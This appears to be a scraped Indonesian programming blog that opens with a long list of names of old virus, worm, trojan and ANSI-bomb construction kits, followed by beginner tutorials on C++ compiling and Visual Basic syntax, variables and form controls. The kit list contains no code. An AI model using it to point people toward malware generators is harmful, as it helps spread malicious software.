ANSI Bomb Constructor by Duke
The ANSI Bomb Generator
Ansi Bomb Kit
Ansi Bomb Maker
Apokalipses
BAT Poly Generator
Batch Encrypt
Batch Maker
Batch Trojan Generator
Batch Virus Construction Kit
Batch Worm Generator
Batch-O-Matic
Bayros Virus Creation Kit
Bio Hazard Worm Generator
Biological Warefare Virus Creation Kit
BOOM: AnsiBomb Construction Kit
Boot Trojan Generator
Bubble Chamber
Byte Virus Generator
C++ Worm Generator
CcT's Malware Construction Kit
China Town Macro Word Virus Construction Kit
Class Macro Kit
Class.Poppy Construction Kit
CM's Batch Virus Generator
Code Pervertor
CompVCK
CVEX Virus Maker
The Czybik Gen Creation Kit
Dangerous Menu
Dark Slick's Virus Creator
Dav's Delphi Worm Generator
Dav's Media Files Worm Kit
Dav's Virus Builder
Deinonychus Virus Generator
Delphi Batch Virus Kit
Digital Hackers' Alliance Randomized Encryption Generator
The Ding Lik's Millenium C Virus Generator
Dirty Nazi Virus Generator
Duke's Pascal Overwriting Generator
Duke's Pascal Virus Generator
Duke's Simple Virus Cloner Tool
Easy ANSI Bomb Creator
Ejecutor Virus Creator
El-Trucha's Virus Maker
Elektronny Pisatel Virusow
Evil Tool
The Fabulous Jany Batch Vir Gen
Falckon Encrypter
FETIOP
G2 Virus Generator
GenVirus
The German Virus Construction Kit
Gildo Backdoor Generator
Hell P2P Worm Generator
Hutley's mIRC BackdooR Generator
Immortal EAS Virus Creation Centre
The Incredible Batch Bug Maker
Indonesian Virus Source Creator
Indra VBS Worm Construction Kit
Instant Virus Production Kit
Java Script Dav Kit
Javascript Encrypter
JavaScript Generator
JPS Virus Maker
Kagra VBS Worm Generator
Kefi's HLLP Construction Kit
Kefi's HTML Virus Construction Kit
Kefi's P2P Worm Generator
Kids Worm Generator
Kuzja Generator
LAB v1.4 L├Ądt den X-14 Virus in eine Datei
Laboratorio de virus
LineZer0 Macro Engine
Looper Generator
Lord Of Navan's Invasion Generator
MacrEngine
The Macro Access Kit
Macro Virus Development Kit
Make Your Instant VBS Worm Engine
Mass Destruction Library
Mass O Shit Code Generator
Metric Buttload of Code Generator
Microsoft Macro Virus Generator
Microsoft Visual Basic Script Worm Editor
Mini Ultras Construction Kit
Mister Spock - Virusgenerator Version
MPCGEN Mass Code Generator
MSH Virus Kit
Necronomikons M$ Auto CAD 2002 Virus Maker
Necronomikons Terror Virus Construction Kit
Necronomikons Windoze Worm Factory
Necronomikons Word2K Classvirus Construction Kit
Necronomikons WordXP Macrovirus Generator
NEUROiD Word Macro Virus Generator
Newborn Worm Generator
Next Generation Virus Construktion Kit
Nightmare Joker Word Macro Virus Construction Kit
Nowhere Utilities
NuKE's Randomic Life Generator
Odysseus Macro Virus Construction Kit
Overwritting Virus Construction Toolkit
P0ke's Worm Generator
PetiK Script Worm and Virus Generator
Phalcon/Skism Mass-Produced Code Generator
Powerpoint Macro Generator
Psychologic Script Poly Engine
Psychologic VBS Poly Generator
Purgatory Companion Virus Kit
A Quick & Easy Trojan Developing System
Rajaats Recursive Random Assembler Code Creator
Random Batch Trojan Generator
Random Silly Batch Generator
Razorblade's Batch Virus Generator
Satan's Apocalypse Virus Generator
Satanic Brain Virus Tool's
Senna Spy Internet Worm Generator 2000
Senna Spy One EXE MAker
Senna Spy Trojan Generator
Setman
sevenC BatcH Generator
sevenC Polymorph VBS Generator
The Shinny Batch Trojan Generator
SHVK: Simple HTML Virus Kit
SiCem Virus Creation Labs
Simple and Fast Html Virus Maker
Simple Batch Virus Maker
Simple Chr Encrypter
Simple Script Wormer
Simple Strreverse Encrypter
Simple Win32ASM Overwriter Generator
The Simple WinScript Virus Kit
Skype Worm Generator
The SMEG Virus construction kit
SpaMaCidAL trojan batch file creator
Sucke MiRc Worm Generator
The Super Appending Batch VCK
TAPiON Polymorphic Decryptor Generator
Toxic CV
The Trojan Generator
The Trojan Horse Construction Kit
TSCMK: The Simple Class Macro Kit
TSR Time Bomb Creator
TVBSG Visual Basic Script worm generator
TVBVK: The Visual Basic Virus Kit
Tvorets Chervey
Uber Worm Generator
Ultras Construction Kit for Word
VBS Encryptor
VBS Phirus Constructor
VBS Worm Generator
VCL32
VDX Batch Generator
Viral Matrix
Virus Construction Set
Virus Creation 2000
Virus Creation Lab
Virus Creator 2000
Virus Development Kit
Virus Factory mit Code - Tabelle
A virus generator
Virus Lab Creations
Virus Laboratory for DOS
Virus Researcher's Toolkit
The Virus Wizard
Visual Basic Worm Generator
The WalruS Macro Virus Engine
The WalruS Macro Virus Generator
Wavefunc's Goofy Batch Virus Generator v1.1c
WG Batch n' Script
Windows Scripting Host Worm Constructor
Windows Virus Creation Kit
WMF Maker
Wonesek VBS Joiner
Word97 Macro Virii Construction Kit
Worm IRC Script Kit
WVSG: Word97 VBA SR1 Generator
XVGL
Ye Olde Funky Virus Generator
Zed's Word Macro Virus Constructor
Baca Selengkapnya >>... Agregar a facebook

Pengenalan C++

Belajar pemrograman tidak ubahnya seperti jaring laba-laba, dari bahasa satu dengan yang lainnya saling terkait. Jika kemarin masih suka otak-atik PERL, PHP, DELPHI, Bahasa C, sekarang lagi kepengen belajar C++.

C++ bukan bahasa baru di lingkungan programmer komputer, bahkan merupakan bahasa yang paling banyak digunakan oleh programmer. Jika anda ingin belajar bahasa pemrograman alangkah baiknya Anda mulai dari Bahasa C, karena dari bahasa inilah banyak bahasa pemrograman dikembangkan, seperti PHP, PERL, Java. bahasa-bahasa ini yang populer saat ini. setidaknya jika bahasa-bahasa itu bukan pengembangan dari bahasa C, tetapi struktur dan fungsi-fungsi dasarnya ada kemiripan.

C++ sendiri artinya C=C+1, maksud dari rumusan ini adalah bahwa C++ merupakan bahasa kelanjutan dari Bahasa C. C++ sendiri berkembang dari versi lama (klasik) sampai sekarang versi modern. Perbedaan yang nyata dari versi ini adalah pada pemanggilan file header dan panggunaan namespace. Jika pada C++ klasik pemanggilan file header dengan menyertakan ekstensi dari file tersebut misal
#include
Tetapi untuk versi modern cukup dengan #include

Pada C++ ada beberapa direktif yang harus dikenali, direktif ini di deklrasikan degan menggunakan tanda #. Berikut direktif pada C++:
* #define
* #elif
* #else
* #endif
* #error
* #if
* #ifdef
* #ifndef
* #include
* #line
* #pragma
* #undef

Struktur Program C++.
Seperti bahasa pemrograman lainya C++ memiliki struktur program standar yang harus diikuti, struktur programnya sebagai berikut:

#include (file-header)
using namespace std; (memanggil namespace std sbg contoh);
int main()
{
//statemen
//statemen
return 0;
}

bentuk di atas adalah bentuk struktur program standar C++ tanpa mendefiniskan Variabel, konstanta, Fungsi, Class, template.

Contoh program sederhana menuliskan "Hallo Didik" Di layar monitor:

#include
using namespace std;
int main()
{
cout<< "Hello Didik"<< endl;
return 0;
}

Komentar Program
Komentar atau keterangan program adalah baris yang akan dilewat oleh compiler, baris ini sebenarnya tidak berpengarus pada program, tapi dengan adanya komentar atau keterangan ini program akan mudah di mengerti dan lebih mudah di cari kesalahan jika ternya ada kesalahan dalam logika pemrograman.

untuk menuliskan komentar di gunakan tanda // untuk komentar yang hanya 1 (satu) baris sendangkan untuk multi baris digunakan tanda /* dan ditutup dengan */ contoh:

#include //Memanggil dile header iostream.h
using namespace std;
int main()
{
/* Program Oleh Didik Kurniawan
Dibuat pada tanggal 29-juni-2007
*/
cout<< "Hello Didik"<< endl;
return 0;
}

Compile program

Compiler C++ yang ada sekarang ini tidak sedikit, akan tetapi pada artikel ini saya akan memperkenalkan compiler C++ pada linux yaitu g++ dan complier pada console windows yang diinstall bersamaan dengan Microsoft Visual C++.

berikut langkah-langkan mengkompile dengan menggunakan g++:
simpan script diatas dengan nama hello.cpp
jalankan linux console, dan arahkan ke direktori tempat anda menyimpan file tersebut misalnya di /home/rajha/c++, lau ketikan perintah berikut:
(ingat [shell] tidak perlu diketikan)

[shell] g++ hello.cpp -o hello (enter)

jika tidak ada kesalahan maka hasil kompile akan membuat file hello, jalankan file tersebut dengan cara

[shell] ./hello (titik garis miring)

sedangkan pada windows nama compiler untuk C++ adalah cl, jika anda menginstall Visual C++, maka di start-menu anda akan ada menu :
Visual C++ 2005 Express Edition->Visual Studio Tools->Visual Studio 2005 Command Prompt.Dengan perintah command prompt biasa arahkan ke di direktori kerja Anda, kemudian dengan menggunakan notepad atu editor lainya salin script di atas dan simpan dengan nama "hello.cpp" (jangan lupa menyimpannya di tempat direktori kerja Anda)

kembali lagi ke command prompt:

untuk mengkompile gunakan perintah:

D:\data\c++> cl hello.cpp

jika script tadi benar, maka akan ada file hello.exe

jalankan file tersebut dengan mengetikan hello


Baca Selengkapnya >>... Agregar a facebook

Sabtu, 17 Mei 2008

Mengontrol Alur Programming

7.1 Operator Kondisi

Untuk mengontrol alur program dalam Visual Basic, kita bisa menggunakan bermacam-macam operator kondisi. Pada dasarnya, operator kondisi ini mirip dengan operator aritmatik. Operator kondisi merupakan alat yang sangat hebat, dengan operator tersebut kita dapat melakukan perbandingan untuk memutuskan tindakan selanjutnya. Tabel dibawah ini menunjukan operator kondisi yang digunakan dalam Visual Basic.


OPERATOR
MAKSUD
=
Sama dengan
>
Lebih besar
<
lebih kecil
>=
Lebih besar sama dengan
<=
Lebih kecil sama dengan
<>
Tidak sama dengan


Anda juga dapat membandingkan string dengan menggunakan operator tersebut. Akan tetapi ada aturan-aturan yang telah ditetapkan untuk membandingkan nilai string. Huruf besar lebih kecil dibandingkan huruf kecil, "A"<"B"<"C"...<"Z" dan angka lebih kecil dibandingkan huruf.

7.2 Operator Logika

Sebagai tambahan untuk operator kondisi, ada beberapa operator logika yang ditambahkan pada Visual Basic sehingga memudahkan pembuatan alur program.


OPERATOR
MAKSUD
And
Keduanya harus bernilai True
or
Salah satu saja yang bernilai True
Xor
Salah satu boleh bernilai True tetapi tidak boleh keduanya bernilai True
Not
Bernilai False



7.3 Pernyataan If.....Then.....Else

Untuk mendapatkan hasil yang baik dalam mengontrol alur program, sebaiknya kita menggunakan pernyataan if...then...else digabungkan bersama operator kondisi dan operator logika.
Syntak umum untuk pernyataan if...then...else adalah
If kondisi Then
VB expressions
Else
VB expressions
End If
Pernyataan If..Then..Else harus diakhiri dengan " End If". Pernyataan Else tidak selalu digunakan, ada kalanya kita tidak membutuhkan pernyataan tersebut.
Contoh:
Private Sub OK_Click()
hrgbrg = txtHargaBarang
jmlbrg = txtJumlahBarang
hrgtotal = hrgbrg * jmlbrg
If hrgtotal >= 5000000 And jmlbrg >= 10 0 Then
diskon = 300000
Else
diskon = 0
End If
hrgtotal=hrgtotal-diskon
End Sub

7.4 Select Case

Jika anda mempunya banyak kondisi, pernyataan If..Then..Else kurang efektif. Untuk kondisi yang banyak pernyataan Select Case lebih baik.
Syntax :
Select Case ekspresi
Case nilai1
VB statement
Case nilai2
VB Statement
Case nilai3
VB statement
Case nilai4
.
.
.
Case Else
VB Statement

End Select
Type data pada expression harus sama dengan nilai pada Case.

7.5 Contoh

Contoh 7.5.1
Dim Nilai As String
Private Sub Hitung_Click( )
Nilai = txtNilai.Text
Select Case Nilai
Case "A"
result.Caption="Sangat Baik"
Case "B"
result.Caption="Baik"
Case "C"
result.Caption="Cukup"
Case Else
result.Caption="Buruk"
End Select

End Sub
Catatan : variable nilai adalah string sehingga nilai yang ada pada case seperti "A" adalah tipe data string juga.
Contoh 7.5.2
Dim Nilai As Single
Private Sub Hitung_Click()
Nilai = txtNilai.Text

Select Case Nilai

Case Is >= 85
comment.Caption = "Sangat Bagus"Case Is >= 70
comment.Caption = "Bagus"
Case Is >= 60
comment.Caption = "Rata-Rata"
Case Is >= 50
comment.Caption = "Cukup"
Case Else
comment.Caption = "Blo'on !!!"

End Select
End Sub
Keyword Is disini untuk menentukan kondisi. Biasa digunakan untuk data numeric.
Contoh 7.5.3
Dim Nilai As Single
Private Sub Hitung_Click()

Nilai = txtNilai.Text

Select Case Nilai

Case 0 to 49
comment.Caption = "Blo'on !!!"
Case 50 to 59
comment.Caption = "Rata-Rata"
Case 60 to 69
comment.Caption = "Diatas Rata-rata"
Case 70 to 84
comment.Caption = "Bagus"
Case Else
comment.Caption = "Sangat Bagus"

End Select
End Sub


Baca Selengkapnya >>... Agregar a facebook

Bekerja dengan Variabel

1. Menetapkan Nilai Variable

Setelah mendeklarasikan variable menggunakan Dim Statement, kita dapat menetapkan nilai kepada variable tersebut. Format umum yang digunakan adalah

Variable=Expression

Variable bisa berisikan variable lain yang telah dideklarasikan, atau juga nilai dari suatu kontrol. Ungkapan bisa berupa ungkapan matematika, angka, string, boolean (true atau false) dan lain sebagainya.

nama = firstname 'variable berisikan variable lain
kota = text1.text 'nilai suatu kontrol
sTotal = jmlbrg * hrgbrg 'ungkapan matematika
hrgbrg = 20000 'angka
alamat = "jakarta selatan" 'string
mulai = true 'boolean

2. Operator Dalam Visual Basic

Untuk menghitung dan memanipulasi variable dibutuhkan suatu operator aritmatik. Pada tabel berikut ini akan ditunjukan operator artimatik yang digunakan dalam Visual Basic.

OPERATOR FUNGSI ARITMATIK CONTOH
^ Pangkat 2^4=16
* Perkalian 4*3=12
/ Pembagian 12/4=3
Mod Modulus (sisa pembagian) 15 Mod 4=3
\ Pembagian Integer (mengabaikan pecahan desimal ) 19\4=4
+ or & String Manipulasi "Visual"&"Basic"="Visual Basic"


Next ==>
Baca Selengkapnya >>... Agregar a facebook

Type Data dalam Visual Basic

5.1.1 Numeric Data

Numeric data adalah data yang terdiri dari angka yang dapat dihitung dengan standar operator perhitungan seperti tambah, kurang, kali, dan bagi. Dalam Visual Basic tipe data numeric dibagi menjadi 7 tipe. antara lain:

TYPE

UKURAN

RANGE
Byte 1 byte 0 to 255
Integer 2 bytes -32,768 to 32,767
Long 4 bytes -2,147,483,648 s/d 2,147,483,648
Single 4 bytes -3.402823E+38 s/d -1.401298E-45 untuk nilai negative
1.401298E-45 s/d 3.402823E+38 untuk nilai positive
Double 8 bytes -1.79769313486232e+308 s/d -4.94065645841247E-324 untuk nilai negatif
4.94065645841247E-324 s/d 1.79769313486232e+308 untuk nilai positif
Currency 8 bytes -922,337,203,685,477.5808 s/d 922,337,203,685,477.5807
Decimal 12 bytes +/- 79,228,162,514,264,337,593,543,950,335 jika tidak menggunakan desimal
+/- 7.9228162514264337593543950335 (28 decimal places).

5.1.2 Nonmeric Data Type

TYPE UKURAN RANGE
String(fixed length) Panjang string 1 s/d 65,400 karakter
String(variable length) Panjang + 10 bytes 0 s/d 2 milyar karakter
Date 8 bytes January 1, 100 s/d December 31, 9999
Boolean 2 bytes True atau False
Object 4 bytes embedded object
Variant(numeric) 16 bytes Sama dengan double
Variant(text) Panjang + 22 bytes Same dengan panjang string

5.1.3 Suffixes Literals

Literals adalah nilai uang anda tentukan pada data. Pada kasus tertentu kita perlu menambahkan suffik disamping literal sehingga perhitungannya lebih akurat. Contohnya kita dapat menggunakan num=1.3089 untuk type data double.

SUFFIKS

TYPE DATA

& Long
! Single
# Double
@ Currency

Pada saat tertentu, kita perlu menyertakan string literal dalam dua tanda kutip, date dan time literal dalam tanda pagar "#". String dapat mengandung karakter apa saja termasuk angka. Untuk jelasnya lihat contoh berikut ini.

Nama="Kim Hee, Sun."
Telepon="062-021-696969"
Tanggal=#31-Dec-00#
Jam=#12:00 am#

5.2 Variables

Variable adalah nilai yang dapat berubah setiap saat. Pada kondisi ini, variable adalah area yang dialokasikan oleh komputer untuk menyimpan data. Setiap variable harus diberi nama, untuk menamakan suatu variable dalam Visual Basic, anda harus mengikuti aturan yang sudah ditentukan.

5.2.1 Penamaan Variable

Aturan yang dipakai ketika menamakan suatu variable dalam Visual Basic adalah sebagai berikut:

  • Tidak boleh melebihi 255 karakter

  • Tidak boleh memakai spasi

  • Tidak boleh dimulai dengan angka

  • Tidak boleh memakai titik

Dibawah ini adalah contoh penamaan variable yang diperbolehkan dan tidak.

VALID NAME

INVALID NAME

Jml_Brg Jml.Brg
Nama1 1Name
Total_penjualan_bulan_desember He&HisFather
Tanda & tidak diizinkan

5.2.2 Deklarasi Variable

Dalam Visual Basic, sangat dianjurkan untuk mendeklarasikan suatu variable dengan cara menentukan nama dan type data yang digunakan. Normalnya kita mendeklarasikan suatu variable pada general section menggunakan Dim statement akan tetapi kita bisa juga mendeklarasikannya dalam suatu prosedur atau fungsi.

Contoh sederhana untuk mendeklarasikan suatu variable

Dim nama As String
Dim jmlbrg As Integer
Dim pajak As Double
Dim lcounter As byte
Dim tanggal As Date

Anda juga bisa mendeklarasikannya dalam bentuk menyamping kekanan.

Dim nama As String, jmlbrg As Integer, ... dst

Untuk mendeklarasikan tipe data string, ada dua cara. Pertama variable-length string dimana syntak pendeklarasiannya sama seperti yang diatas sedangkan yang kedua adalah fixed-length string. Syntak penggunaannya adalah:

Dim VariableName as String * n, dimana n adalah jumlah karakter yang digunakan

Misalnya:

Dim NamaAnda as String * 20

Dengan mendeklarasikan suatu variable sebelum menggunakan, akan menghemat pemakaian memory. Ini dikarenakan jika kita tidak mendeklarasikan variable sebelum pemakaian, maka Visual Basic menganggap variable itu sebagai variable tipe variant, dimana untuk tipe data variant ukurannya sangat memboroskan memory.


Next ==>


Baca Selengkapnya >>... Agregar a facebook

Bekerja Dengan Kontrol

Sebelum menulis event prosedur dari kontrol untuk merespons user, anda harus memastikan properti dari masing-masing kontrol tersebut dan bagaimana kontrol tersebut bekerja. Anda bisa merubahnya properti tersebut melalui properties window. Kita tidak akan menjelaskan secara detail bagaimana mengubah properti tersebut, akan tetapi hanya menitikberatkan pada point-point tertentu saja yang dianggap penting.

Anda harus men-set Caption Property dari kontrol sehingga sehingga user mengetahui apa yang harus mereka lakukan dengan kontrol tersebut. Misalnya pada command button yang telah diberi caption "OK" atau "Cancel", user akan tahu apa yang harus mereka lakukan dengan command button tersebut dibandingkan jika anda hanya memberi nilai default dari command button tersebut.

Anda harus men-set Name Property dari masing-masing kontrol yang mencerminkan maksud dari kontrol tersebut, sehingga anda akan mudah untuk membaca alur program anda dan anda dapat dengan mudah men-debugnya dikemudian hari.

Property lainnya yang tidak kalah penting adalah apakah anda menginginkan kontrol tersebut terlihat atau tersembunyi pada saat startup. Property ini dapat anda set menjadi True atau False.

Hal lain yang lebih penting adalah apakah kontrol tersebut aktif atau tidak dengan merubah property enable menjadi True atau False.

1. Label

Label adalah kontrol grafik yang dapat anda gunakan untuk menampilkan text dimana user tidak dapat merubahnya secara langsung. Anda dapat merubahnya melalui kode pemrograman pada saat run time. Untuk merubah textnya anda bisa mengubah captionnya dan mengisikan text sesuai dengan keinginan anda.

Ubah AutoSize dan WordWrap properti menjadi true jika anda ingin menampilkan seluruh text tanpa harus merubah kontrol label tersebut secara manual.

2. Text Box

TextBox kontrol digunakan untuk menampilkan informasi dimana user dapat merubahnya secara langsung. TextBox juga dapat dirubah melalui kode pemrograman pada saat run time. Untuk merubah textnya anda bisa merubah text properti pada textbox tersebut.

Untuk menampilkan banyak text anda bisa merubah MultiLine properti menjadi true. Anda juga bisa menampilkan scrollbar pada textbox tersebu dengan merubah scrollbar properti.

3. Command Button

Kontrol ini yang paling sering digunakan karena berfungsi seperti tombol pada umumnya. Anda bisa merubah textnya dengan merubah caption properti. Untuk menentukan aksi apa yang akan dilakukan jika anda mengklik tombol tersebut anda bisa mengisikan kode program anda pada event click.

4. ListBox

ListBox digunakan untuk menampilkan sejumlah item dimana user dapat memilih satu atau lebih item yang tersedia. Jika jumlah item yang ditampilkan melebihi ukurannya, listbox secara otomatis akan menampilkan scrollbar.

Jika tidak ada item yang dipilih nilai pada ListIndex adalah -1. Item pertama akan diberi nilai 0 sedangkan nilai ListCount adalah jumlah item ditambah 1.

Untuk menambah item anda bisa menggunakan AddItem method sedangkan untuk menghapusnya anda bisa menggunakan RemoveItem method.

5. ComboBox

ComboBox menggabungkan feature texbox dan listbox, hanya memakan sedikit ruang pada layar. Anda bisa memasukan item secara langsung pada combobox berbeda dengan listbox dimana user hanya dihadapkan pada pilihan yang tersedia. Anda bisa merubah style pada combobox sesuai dengan kebutuhan, ComboDropDown, ComboSimple, ComboDropDownList.

6. CheckBox

CheckBox akan menampilkan tanda X jika dipilih. Gunakan kontrol ini untuk memberikan pilihan benar/salah atau Ya/Tidak pada user. Anda juga bisa menggunakan checkbox untuk memberikan banyak pilihan pada user.

7. OptionButton

OptionButton hanya mengijinkan user untuk memilih satu dari sekian banyak item yang ditampilkan. Untuk membuat suatu grup pilihan anda harus menempatkan optionbutton pada Frame kontrol atau PictureBox.

8. Frame

Frame kontrol menyediakan grouping untuk suatu kontrol. Anda bisa menggunakannya untuk memisah-misahkan kontrol berdasarkan fungsinya. Sebagai contoh untuk membuat group dari OptionButton.

9. PictureBox

PictureBox digunakan untuk menampilkan gambar dari bitmap file, icon, metafile dan juga JPEG atau GIF. PictureBox juga dapat digunakan untuk grouping suatu kontrol.


Next ==>



Baca Selengkapnya >>... Agregar a facebook

Propertis Window

Kita telah mengenal properties windows pada artikel sebelumnya, sekarang kita akan membahas lebih lanjut mengenai properties window. Bagian terpenting dalam mendesain form visual basic adalah desain yang telah kita buat harus dapat dimengerti oleh user atau pemakai, sehingga tidak menimbulkan kesulitan misalnya dalam entry data oleh pemakai. Bagi programmer, memberikan nama kontrol yang mempunyai arti sangatlah penting agar program yang telah dibuat lebih mudah dimengerti.

Sebagai contoh :

If x1 >50 Then
Text2 = 0.2 * x2
Else
Text3 = 0
End If

Mungkin anda akan bingung. Apa itu x1, x2, Text2 & Text3.

Bagaimana jika penulisannya dirubah menjadi demikian :

If sJmlBrg >50 Then
txtDiscount = 0.2 * sHrgBrg
Else
txtDiscount = 0
End If

Walaupun anda bukan pembuat programnya namun anda pasti bisa mengerti apa maksud dari penggalan program di atas.

Untuk form, label dan command button, caption property sebaiknya kita rubah sesuai dengan maksudnya. Caption adalah teks yang akan terlihat pada label, command button atau pada judul form.

Begitu juga untuk TextBox, nilai yang anda inginkan terlihat pada form haruslah dirubah. Pada artikel sebelumnya program yang telah kita buat masih menggunakan nilai default yang diberikan oleh VB, yaitu Text1, Text2, Text3 & Text4. Dalam pembuatan sebuah aplikasi, hal seperti ini tidaklah efisien, karena pemakai harus menghapus text tersebut sebelum memasukan data yang dimaksud. Normalnya, kita ingin agar nilai dari text tersebut kosong, kalaupun nilainya harus ada maka nilainya harus sesuai. Sebagai contoh nilai dari text untuk pajak adalah 10%.

3.2 Names

Dalam pembuatan program menggunakan code, kontrol yang telah digunakan sebaiknya diberi nama awalan sesuai dengan nama kontrol tersebut dan sisanya kita beri nama yang sesuai dengan maksudnya. Dibawah ini adalah pemberian nama standar untuk setiap kontrol.

Kontrol

Kontrol Prefix

Nama Objek

Nama
Lengkap

Form1

frm

Stock

frmStock

Text1

txt

Harga

txtHarga

Command1

cmd

Keluar

cmdKeluar

Dalam Visual Basic, pemberian nama tidak boleh mengandung spasi. Sebagai contoh jika kita ingin memberi nama form "Entry Data Stock" sebaiknya kita menggunakan nama frmEntryDataStock.

Latihan Kedua

  1. Buka project yang telah kita buat pada latihan pertama(File Menu, Open Project, stock.vbp)

  2. Klik form tersebut - jangan klik kontrol

  3. Klik Caption property dan ubah menjadi 'Order Entry'.

  4. Klik Name property dan ubah menjadi frmOrder.
    Catatan : Bedakan antara Caption dan Name. Caption adalah label yang akan terlihat langsung pada form sedangkan Name adalah nama yang digunakan oleh anda/programmer. Name digunakan untuk mengakses form atau kontrol tersebut dalam pemrograman.

  5. Klik text box Text1. Pada properties window, klik Name Property dan rubah Name menjadi txtNamaBrg. Klik Text Property dan hapus 'Text1'. Lakukan hal yang sama pada Text2, Text3 dan Text4 dan ubah Name Property menjadi txtHrgBrg, txtJmlBrg dan txtTotal.

  6. Ubah Name Property pada dua command button yaitu menjadi cmdHitung & cmdKeluar

  7. Double Klik cmdHitung ketikan kode berikut ini

Private Sub cmdHitung_Click()
txtTotal = txtHrgBrg * txtJmlBrg
End Sub

Private Sub cmdKeluar_Click()
Unload Me
End Sub

  1. Klik Save shortcut pada toolbar untuk menyimpan perubahan tersebut.

  2. Jalankan program tersebut isilah txtNamaBrg, txtHrgBrg dan txtJmlBrg kemudian klik tombol Hitung

Next ==>


Baca Selengkapnya >>... Agregar a facebook
 

Recent Comment

Pengikut